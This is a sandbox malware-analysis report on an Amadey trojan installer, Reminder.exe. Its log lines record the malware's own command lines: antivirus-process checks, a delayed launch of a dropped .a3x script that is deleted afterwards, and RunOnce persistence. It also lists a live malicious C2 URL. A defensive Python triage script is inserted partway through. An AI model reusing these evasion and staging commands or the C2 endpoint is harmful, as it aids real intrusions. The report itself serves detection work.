Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Window found: window name: TMainForm
Source: Reminder.exe Static file information: File size 10161880 > 1048576
Source: Reminder.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Reminder.exe Static PE information: real checksum: 0x9b2654 should be: 0x9bc79f
Source: Reminder.exe Static PE information: section name: .didata
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp File created: C:\Users\user\AppData\Local\Temp\is-8CPJ0.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp File created: C:\Users\user\AppData\Local\Temp\is-8CPJ0.tmp\_isetup\_isdecmp.dll
Source: C:\Users\user\Desktop\Reminder.exe File created: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp File created: C:\Users\user\AppData\Local\coigned\is-9F4FN.tmp
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fdeahdg
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fdeahdg
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fdeahdg
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fdeahdg
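Updater.exe writes the same HKCU RunOnce value, fdeahdg, four times, once per launch of the binary. RunOnce values are removed by Windows as soon as they are consumed at the next logon, so on a live host the key can already be empty by the time a responder looks, and the autorun may have to be recovered from the report, a registry transaction log or the user's NTUSER.DAT. The added example below is not code from the report or the sample: it parses reg query style output for Run and RunOnce values and lists, for each one, the three points a triage analyst would check (RunOnce rather than Run, an image under a user-writable directory, a value name unrelated to the image it launches). The text it parses is constructed, and the data of the fdeahdg value is an assumption that it points at Updater.exe with its script argument, since the report records only the value name.

```python
"""Triage of HKCU Run/RunOnce autostart values from 'reg query' style text.
Added example, not code from the report or the sample; the sample text below is
constructed, and the data of the fdeahdg value is an assumption (the report
records only the value name)."""
import re

USER_WRITABLE = ("\\appdata\\local\\", "\\appdata\\roaming\\",
                 "\\programdata\\", "\\temp\\", "\\users\\public\\")

# A 'reg query' value line: <name>  REG_TYPE  <data>, columns separated by runs of spaces.
VALUE_LINE = re.compile(r"^\s{2,}(?P<name>\S.*?)\s{2,}(?P<type>REG_[A-Z_]+)\s{2,}(?P<data>.+?)\s*$")


def parse_reg_query(text):
    """Yield (key, name, type, data) for each value under each key in the output."""
    key = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line.startswith(" "):      # unindented lines are key paths
            key = line.strip()
            continue
        m = VALUE_LINE.match(line)
        if m and key:
            yield key, m.group("name"), m.group("type"), m.group("data")


def image_path(data):
    """Executable named by the value data: a quoted path, else the first token ending in .exe."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    m = re.match(r"(?i)(\S+?\.exe)\b", data)
    return m.group(1) if m else data.split()[0]


def name_matches_image(name, exe):
    """Weak check: does the value name share anything with the executable's file stem?"""
    stem = exe.replace("/", "\\").rsplit("\\", 1)[-1].lower().rsplit(".", 1)[0]
    return name.lower() in stem or stem in name.lower()


def triage(text):
    """Return (value name, image path, reasons) for every autostart value worth a look."""
    findings = []
    for key, name, _vtype, data in parse_reg_query(text):
        exe = image_path(data)
        reasons = []
        if key.upper().endswith("\\RUNONCE"):
            reasons.append("runonce_key")
        if any(marker in exe.lower() for marker in USER_WRITABLE):
            reasons.append("user_writable_image")
        if not name_matches_image(name, exe):
            reasons.append("name_unrelated_to_image")
        if reasons:
            findings.append((name, exe, reasons))
    return findings


# Constructed output; the fdeahdg data is assumed to launch Updater.exe with its script.
SAMPLE_REG_QUERY = r"""HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
    fdeahdg    REG_SZ    "C:\Users\user\AppData\Local\coigned\Updater.exe" "C:\Users\user\AppData\Local\coigned\friendliwise.csv"
"""

if __name__ == "__main__":
    for name, exe, reasons in triage(SAMPLE_REG_QUERY):
        print(f"{name}: {exe} [{', '.join(reasons)}]")
```

OneDrive trips the user-writable check as well, which is why the function returns the reasons rather than a single verdict: an image under %LOCALAPPDATA% is normal for per-user installers, and it is the combination with a RunOnce key and an unrelated value name that singles out fdeahdg.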
Source: C:\Users\user\Desktop\Reminder.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Reminder.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-8CPJ0.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-8CPJ0.tmp\_isetup\_isdecmp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep count: 102 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep time: -3060000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6512 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep count: 191 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep time: -5730000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 180000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information queried: ProcessInformation

      Anti Debugging

      Source: C:\Windows\System32\tasklist.exe | System information queried: CodeIntegrityInformation
      Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
      Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
      Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
      Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
      Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
      Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
      Source: C:\Users\user\AppData\Local\coigned\Updater.exe | Memory protected: page readonly | page read and write | page write copy | page execute | page execute and read and write | page guard
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp | Process created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
      Source: C:\Users\user\AppData\Local\coigned\Updater.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\ZPrVgH71.a3x && del C:\ProgramData\\ZPrVgH71.a3x
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\coigned\Updater.exe updater.exe C:\ProgramData\\ZPrVgH71.a3x
      Source: C:\Users\user\AppData\Local\coigned\Updater.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      Source: C:\Users\user\AppData\Local\coigned\Updater.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
      Source: C:\Users\user\AppData\Local\coigned\Updater.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
      Source: C:\Users\user\AppData\Local\coigned\Updater.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
      Source: C:\Users\user\AppData\Local\coigned\Updater.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\coigned\Updater.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information

      Source: Yara match | File source: 00000029.00000002.2093368871.0000000003E62000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000002A.00000002.2510265571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      MITRE ATT&CK Matrix

      Techniques listed per tactic column; the number in parentheses is the count of matching behaviour signatures shown next to that technique.

      Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
      Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
      Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
      Execution: Windows Management Instrumentation (1), Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
      Persistence: Registry Run Keys / Startup Folder (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
      Privilege Escalation: Process Injection (11), Registry Run Keys / Startup Folder (1), DLL Side-Loading (1), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
      Defense Evasion: Masquerading (1), Disable or Modify Tools (1), Virtualization/Sandbox Evasion (121), Process Injection (11), DLL Side-Loading (1), Steganography, Compile After Delivery, Indicator Removal from Tools
      Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
      Discovery: Security Software Discovery (1), Process Discovery (2), Virtualization/Sandbox Evasion (121), System Owner/User Discovery (2), Remote System Discovery (1), System Network Configuration Discovery (1), File and Directory Discovery (1), System Information Discovery (33)
      Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
      Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
      Command and Control: Non-Application Layer Protocol (1), Application Layer Protocol (1), Steganography, Protocol Impersonation, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
      Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
      Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample
      Source | Detection | Scanner | Label | Link
      Reminder.exe | 54% | ReversingLabs | Win32.Trojan.Amadey |

      Dropped Files
      Source | Detection | Scanner | Label | Link
      C:\Users\user\AppData\Local\Temp\is-8CPJ0.tmp\_isetup\_isdecmp.dll | 0% | ReversingLabs | |
      C:\Users\user\AppData\Local\Temp\is-8CPJ0.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | |
      C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp | 0% | ReversingLabs | |
      C:\Users\user\AppData\Local\coigned\Updater.exe (copy) | 0% | ReversingLabs | |

      No Antivirus matches
      No contacted domains info
      Contacted URLs
      Name | Malicious | Antivirus Detection | Reputation
      http://152.89.198.124/8bdDsv3dk2FF/index.php | true | | unknown

      Contacted Public IPs
      IP | Domain | Country | Flag | ASN | ASN Name | Malicious
      152.89.198.124 | unknown | United Kingdom | | 209003 | NEXTVISIONGB | true

      Private IPs
      IP
      127.0.0.1
        Joe Sandbox version: 41.0.0 Charoite
        Analysis ID: 1540342
        Start date and time: 2024-10-23 17:02:52 +02:00
        Joe Sandbox product: CloudBasic
        Overall analysis duration:
        Hypervisor based Inspection enabled: false
        Report type: full
        Cookbook file name: defaultwindowsinteractivecookbook.jbs
        Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of new started processes analysed: 44
        Number of new started drivers analysed: 0
        Number of existing processes analysed: 0
        Number of existing drivers analysed: 0
        Number of injected processes analysed: 0
        Technologies:
        • EGA enabled
        Analysis Mode: stream
        Analysis stop reason: Timeout
        Sample name: Reminder.exe
        Detection: MAL
        Classification: mal84.troj.spyw.evad.winEXE@60/7@0/11
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, SgrmBroker.exe, svchost.exe
        • Excluded domains from analysis (whitelisted): fs.microsoft.com
        • Not all processes were analyzed; the report is missing behavior information
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • VT rate limit hit for: Reminder.exe
        Process: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp
        File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
        Category: dropped
        Size (bytes): 29472
        Entropy (8bit): 7.042110181107409
        Encrypted: false
        SSDEEP:
        MD5: 077CB4461A2767383B317EB0C50F5F13
        SHA1: 584E64F1D162398B7F377CE55A6B5740379C4282
        SHA-256: 8287D0E287A66EE78537C8D1D98E426562B95C50F569B92CEA9CE36A9FA57E64
        SHA-512: B1FCB0265697561EF497E6A60FCEE99DC5EA0CF02B4010DA9F5ED93BCE88BDFEA6BFE823A017487B8059158464EA29636AAD8E5F9DD1E8B8A1B6EAAAB670E547
        Malicious: false
        Antivirus:
        • Antivirus: ReversingLabs, Detection: 0%
        Reputation: unknown
        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(..n ..(...(...(...$..(...$..(...$..(..Rich.(..................PE..L......B...........!..... ..........p........0....P..........................P.......................................;.......;..(....................4.. ?...@.......0...............................................0...............................text............ .................. ..`.rdata.......0.......$..............@..@.reloc.......@.......2..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp
        File Type: PE32+ executable (console) x86-64, for MS Windows
        Category: dropped
        Size (bytes): 6144
        Entropy (8bit): 4.720366600008286
        Encrypted: false
        SSDEEP:
        MD5: E4211D6D009757C078A9FAC7FF4F03D4
        SHA1: 019CD56BA687D39D12D4B13991C9A42EA6BA03DA
        SHA-256: 388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
        SHA-512: 17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
        Malicious: false
        Antivirus:
        • Antivirus: ReversingLabs, Detection: 0%
        Reputation: unknown
        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
        Process: C:\Users\user\Desktop\Reminder.exe
        File Type: PE32 executable (GUI) Intel 80386, for MS Windows
        Category: dropped
        Size (bytes): 3325440
        Entropy (8bit): 6.597962076419531
        Encrypted: false
        SSDEEP:
        MD5: 4BFB5A37DC6ACBC273CEB792408BFEC9
        SHA1: 51C820B195E7E9069D5BE0CAE12A0D566BA358A2
        SHA-256: E35B01344C6ABD6463439DC23A450C3ED5FA656778647CBEA070E1F6A4A9C906
        SHA-512: 01C87EC83C258657B663A90819534546A847DC30903C9AF79F45048CD11C598660CF253F23575FE7B471B7DE07BDA902D7E1526D21EF8785B2F80C14B83FD5D3
        Malicious: false
        Antivirus:
        • Antivirus: ReversingLabs, Detection: 0%
        Reputation: unknown
        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@...........................3...........@......@...................P,.n.....,.j:...P0..8....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc....8...P0..:..../.............@..@.............04......`3.............@..@................
        Process: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp
        File Type: PE32 executable (GUI) Intel 80386, for MS Windows
        Category: dropped
